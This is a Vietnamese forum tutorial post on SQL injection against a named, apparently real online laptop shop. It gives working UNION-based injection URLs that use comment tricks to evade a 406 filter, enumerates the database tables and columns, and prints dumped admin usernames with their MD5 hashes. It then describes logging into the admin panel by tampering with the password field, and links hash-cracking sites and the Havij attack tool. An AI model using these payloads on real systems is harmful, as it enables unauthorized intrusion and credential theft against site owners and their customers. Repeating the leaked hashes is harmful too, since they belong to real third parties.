[TUT] SQL injection & Login Admin cp khi ko thể decode mã MD5

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 7, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    Bài này mình đã up bên ceh.vn rồi...hôm nay đưa qua đây cho các bạn mới tham khảo..cũng là 1 chút hối lộ khi mới đăng ký gia nhập diễn đàn chiều nay...mọi người xem rồi cho ý kiến nhé...thank so much!!!

    Dạo này đồ án hơi nhiều....nhưng cũng dành chút thời gian làm cái Tut SQLi cho mấy bạn mới ...

    Mình cũng mới tập tành cái này nên Tut có gì sai sót anh em bỏ qua...
    Chẳng là cũng nhiều lần tắc nghẽn..và sau khi được các bạn trẻ trong Ceh thông thì cũng làm được vài cái...
    -----Trong tut sử dụng nguồn tham khảo là các bài viết trên diễn đàn VHB

    Bắt đầu nhé:

    Hôm nay mình sẽ làm 1 tut khai thác qua lỗi SQL injection...và có 1 số trường hợp sau khi các bạn get được username và password của trang admin cp thì lại ko thể decode được mã MD5 để Login vào nó...cho nên Tut này mình kết hợp khai thác và gợi ý 1 cách để không cần decode mã MD5 get được cũng có thể đăng nhập vào được trang Admin cp.

    ....cách này mình vô tình tìm thấy trên trang blog của VHB Group....cảm ơn các tiền bối trong VHB group đã thông cho em...^^

    Trong bài tut này mình có tham khảo qua cách trình bày của 2 bài TUT trên diễn đàn VHB về khai thác lỗi SQL để làm tut 1 cách dễ hiểu cho các bạn tham khảo

    ok..Victim là đây:

    http://www.laptopus.vn/?frame=product_detail&id=810

    check lỗi nhé.

    thêm dấu ' vào cuối id..thấy site thay đổi..vậy là dính lỗi nhé.
    bây giờ chúng ta get đến các trường cột của site

    http://www.laptopus.vn/?frame=product_detail&id=810 group by 1-- - : site bt nhé

    http://www.laptopus.vn/?frame=product_detail&id=810 group by 2-- - : site bình thường
    .......

    http://www.laptopus.vn/?frame=product_detail&id=810 group by 20-- - : site bình thường

    http://www.laptopus.vn/?frame=product_detail&id=810 group by 21-- - : giao diện website thay đổi ==> lỗi rồi nhé

    Số trường cột cần tìm là 20

    Tiếp theo là tìm những trường cột nào bị lỗi:

    http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -

    các bạn thấy mình thêm dấu - trước ID... mục đích để làm xuất hiện các con số trường cột bị lỗi...và mình kẹp cái /*!SELECT*/...mục đích là để bypass lỗi 406 Not Acceptable

    chúng ta thấy có xuất hiện số 3,7,19,20 đó là những chỗ bị lỗi mà chúng ta có thể khai thác..ở đây mình sẽ khai thác tại vị trí số 3 nhé.


    Bây giờ mình sẽ làm xuất hiện tên các Table trong database của website nhé:

    http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!table_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -

    bước này các bạn cũng nhớ để dấu /*! */ bên ngoài các từ khóa như table_name hay tabe_schema nha ....dùng để bypass lỗi 406 Not Acceptable đó mà

    OK các table chúng ta thu được là :

    tbl_access,tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,
    tbl_product,tbl_product_category,tbl_product_home,tbl_product_pro,tbl_product_sell,tbl_product_special,tbl_user,tbl_visitor

    Đến đây các bạn có thể để ý thấy có 2 bảng chúng ta có thể nghi ngờ đang lưu passwd của admin đó là bảng:
    tbl_member && tbl_user.

    chúng ta sẽ thử từng bảng 1 là xong.Ok....mình thử bảng tbl_user nhé ^^ (mình thử gùi nên biết cái này lưu passwd của admin nè..^^)
    bây giờ chúng ta xuất ra tên các colums chứa username và password

    http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where /*!table_schema*/=database() and /*!table_name*/=0x74626c5f75736572-- -

    Lưu ý 1 chút xíu nhé

    0x tạm hiểu là dùng để nhận dạng khi sử dụng ở dạng mã hex
    74626c5f75736572 là ký tự admin ở dạng hex.
    Link convert các ký tự sang mã hex:
    http://string-functions.com/string-hex.aspx

    Thông tin các columns trong tables tbl_user thu được: id,uid,pwd


    Xuất ra thông tin của Username và Password:

    http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(uid,0x2f,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tbl_user-- -

    Thông tin về username và password được mã hóa md5 thu được:

    admin/e5965b7b6376fd76e1bcf020cd5c277e,phamvan/544763b9890433d487eab5915070bfb3


    Crack Password và tìm link admin:

    - Có nhiều site để crack passwd, ví dụ:
    http://md5cracker.org/
    Hoặc sử dụng google để tìm kiếm

    - Sử dụng các tool để tìm link admin: Havij, Web admin finder
    Havij 1.5 free: http://www.mediafire.com/?bcrs460vcu1vy2q
    Web admin finder 2.5 : http://www.mediafire.com/?ogoclxe83no1xzg
    Pass dải nén: ducdung.08clc

    Ok..đến đây là bước quan trong đây!!!

    Cách login khi không decode đc md5 đối với 1 số site

    Đối với website này..admin đã mã hoá MD5 trước khi post dữ liệu lên server.
    và bạn không thể decode được mã MD5 này...

    Vậy làm sao đây khi có username và passwd mà không thể đăng nhập được vào trang Admincp

    Đến đây chúng ta có thể dùng cách sau : (mình có post video hướng dẫn bên dưới):

    + Bật tamper lên (đây là addon của firfox)
    + Login bằng user (đã get được) và pass (123456)
    + Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)

    Video hướng dẫn:

    http://www.youtube.com/watch?feature=pla...2A3OTOVXvQ

    Làm theo video trên là các bạn đã có thể đăng nhập vào được trang Admincp rồi..
    Chúc bạn thành công..^^
     

Share This Page